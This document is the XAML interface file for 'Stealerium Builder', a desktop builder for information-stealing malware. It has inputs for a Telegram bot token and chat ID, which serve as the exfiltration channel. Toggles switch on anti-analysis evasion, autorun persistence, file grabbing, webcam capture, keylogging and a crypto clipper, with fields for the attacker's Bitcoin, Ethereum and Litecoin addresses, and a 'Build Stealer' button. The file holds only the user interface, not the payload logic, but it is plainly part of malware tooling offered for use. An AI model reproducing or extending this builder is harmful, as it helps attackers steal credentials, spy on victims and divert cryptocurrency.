Stealerium.Builder/MainWindow.xaml

<ui:FluentWindow x:Class="Stealerium.Builder.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:ui="http://schemas.lepo.co/wpfui/2022/xaml"
        xmlns:local="clr-namespace:Stealerium.Builder"
        ui:Design.Background="{DynamicResource ApplicationBackgroundBrush}"
        ui:Design.Foreground="{DynamicResource TextFillColorPrimaryBrush}"
        Foreground="{DynamicResource TextFillColorPrimaryBrush}"
        ExtendsContentIntoTitleBar="True"
        WindowBackdropType="Tabbed"
        Title="Stealerium Builder" Height="800" Width="800">

    <Grid>
        <!-- Main Content Grid -->
        <Grid>
            <!-- Modern TitleBar -->
            <ui:TitleBar Grid.Row="0" OverridesDefaultStyle="True" ApplicationTheme="Dark" />

            <!-- ScrollViewer for Main Content -->
            <ScrollViewer VerticalScrollBarVisibility="Auto">
                <Grid Margin="30">
                    <!-- Column and Row Definitions -->
                    <Grid.ColumnDefinitions>
                        <ColumnDefinition Width="*"/>
                    </Grid.ColumnDefinitions>
                    <Grid.RowDefinitions>
                        <RowDefinition Height="120"/>
                        <RowDefinition Height="Auto"/>
                        <RowDefinition Height="Auto"/>
                        <RowDefinition Height="*"/>
                        <RowDefinition Height="Auto"/>
                    </Grid.RowDefinitions>

                    <!-- Logo Image -->
                    <Image Grid.Row="0" Source="/Resources/STEALERIUM.png" Height="100" HorizontalAlignment="Center" VerticalAlignment="Center"/>

                    <!-- StubStatusLabel below the logo -->
                    <ui:InfoBar Name="StubStatusLabel" Grid.Row="1" Grid.Column="0" Margin="0,10,0,20" HorizontalAlignment="Center"/>

                    <!-- Telegram Configuration Section -->
                    <ui:Card Grid.Row="2" Margin="0,0,0,20" Padding="20">
                        <StackPanel>
                            <TextBlock Text="Telegram Configuration" FontWeight="Bold" FontSize="16" Margin="0,0,0,15"/>
                            
                            <!-- Telegram Bot API Token Input -->
                            <Label Content="Telegram API Token:" Target="{Binding ElementName=ApiTokenTextBox}" Margin="0,0,0,5"/>
                            <ui:TextBox Name="ApiTokenTextBox" PlaceholderText="Enter your Telegram bot API token" 
                                      TextChanged="ApiTokenTextBox_TextChanged" Margin="0,0,0,15"/>

                            <!-- Telegram Chat ID Input -->
                            <Label Content="Telegram Chat ID:" Target="{Binding ElementName=ChatIdTextBox}" Margin="0,0,0,5"/>
                            <ui:TextBox Name="ChatIdTextBox" PlaceholderText="Enter your Telegram chat ID"
                                      TextChanged="ChatIdTextBox_TextChanged" Margin="0,0,0,15"/>

                            <!-- Test Telegram Button -->
                            <ui:Button Name="TestTelegramButton" Content="Test Telegram Connection" 
                                     Icon="Send24" Appearance="Primary" Width="200" 
                                     HorizontalAlignment="Left" Click="TestTelegramButton_Click"/>

                            <!-- WebhookStatusLabel -->
                            <ui:InfoBar Name="WebhookStatusLabel" Margin="0,10,0,0"/>
                        </StackPanel>
                    </ui:Card>

                    <!-- Configuration Options Section -->
                    <ui:Card Grid.Row="3" Margin="0,0,0,20" Padding="20">
                        <Grid>
                            <Grid.ColumnDefinitions>
                                <ColumnDefinition Width="*"/>
                                <ColumnDefinition Width="*"/>
                            </Grid.ColumnDefinitions>

                            <!-- Basic Configuration -->
                            <StackPanel Grid.Column="0" Margin="0,0,10,0">
                                <TextBlock Text="Basic Configuration" 
                                         FontWeight="SemiBold" 
                                         FontSize="16" 
                                         Margin="0,0,0,15"/>
                                
                                <ui:ToggleSwitch Name="DebugCheckBox" 
                                               Content="Debug Mode" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="AntiAnalysisCheckBox" 
                                               Content="Anti-Analysis Protection" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="StartDelayCheckBox" 
                                               Content="Random Start Delay" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="GrabberCheckBox" 
                                               Content="File Grabber" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="StartupCheckBox" 
                                               Content="Autorun" 
                                               Margin="0,5"
                                               Checked="StartupCheckBox_Checked"
                                               Unchecked="StartupCheckBox_Unchecked"/>
                            </StackPanel>

                            <!-- Advanced Options -->
                            <StackPanel Grid.Column="1" Margin="10,0,0,0">
                                <TextBlock Text="Advanced Options" 
                                         FontWeight="SemiBold" 
                                         FontSize="16" 
                                         Margin="0,0,0,15"/>
                                
                                <ui:ToggleSwitch Name="WebcamScreenshotCheckBox" 
                                               Content="Webcam Screenshots" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="KeyloggerCheckBox" 
                                               Content="Keylogger" 
                                               Margin="0,5"/>
                                               
                                <ui:ToggleSwitch Name="ClipperCheckBox" 
                                               Content="Crypto Clipper" 
                                               Margin="0,5"
                                               Checked="ClipperCheckBox_Checked"
                                               Unchecked="ClipperCheckBox_Unchecked"/>

                                <!-- Clipper Addresses Panel -->
                                <ui:Card Name="ClipperAddressesPanel" 
                                       Visibility="Collapsed" 
                                       Margin="0,10,0,0" 
                                       Background="{DynamicResource ControlFillColorDefaultBrush}"
                                       BorderBrush="{DynamicResource ControlElevationBorderBrush}">
                                    <StackPanel Margin="10">
                                        <ui:TextBox Name="ClipperBTCTextBox" 
                                                  PlaceholderText="Bitcoin Address"
                                                  Margin="0,5"/>
                                        
                                        <ui:TextBox Name="ClipperETHTextBox" 
                                                  PlaceholderText="Ethereum Address"
                                                  Margin="0,5"/>
                                        
                                        <ui:TextBox Name="ClipperLTCTextBox" 
                                                  PlaceholderText="Litecoin Address"
                                                  Margin="0,5"/>
                                    </StackPanel>
                                </ui:Card>
                            </StackPanel>
                        </Grid>
                    </ui:Card>

                    <!-- Build Button and Status -->
                    <StackPanel Grid.Row="4" 
                              Orientation="Vertical" 
                              HorizontalAlignment="Center" 
                              Margin="0,0,0,20">
                        <ui:Button Name="BuildButton" 
                                 Content="Build Stealer" 
                                 Icon="Build24" 
                                 Appearance="Success"
                                 Width="200" 
                                 Height="40"
                                 Click="BuildButton_Click" 
                                 IsEnabled="False"/>
                        <TextBlock Name="BuildStatusLabel" 
                                 Text="" 
                                 Margin="0,10,0,0"
                                 TextWrapping="Wrap" 
                                 TextAlignment="Center"
                                 Foreground="{DynamicResource TextFillColorSecondaryBrush}"/>
                    </StackPanel>
                </Grid>
            </ScrollViewer>

            <!-- Overlay Grid for Loading -->
            <Grid Name="LoadingOverlay" Visibility="Collapsed" Background="#80000000">
                <Grid.Effect>
                    <BlurEffect Radius="10"/>
                </Grid.Effect>
                <StackPanel HorizontalAlignment="Center" VerticalAlignment="Center">
                    <ui:ProgressRing IsIndeterminate="True" Width="60" Height="60"/>
                    <TextBlock Text="Processing..." HorizontalAlignment="Center" 
                             Margin="0,10,0,0" Foreground="White" FontSize="16"/>
                </StackPanel>
            </Grid>
        </Grid>
    </Grid>
</ui:FluentWindow>
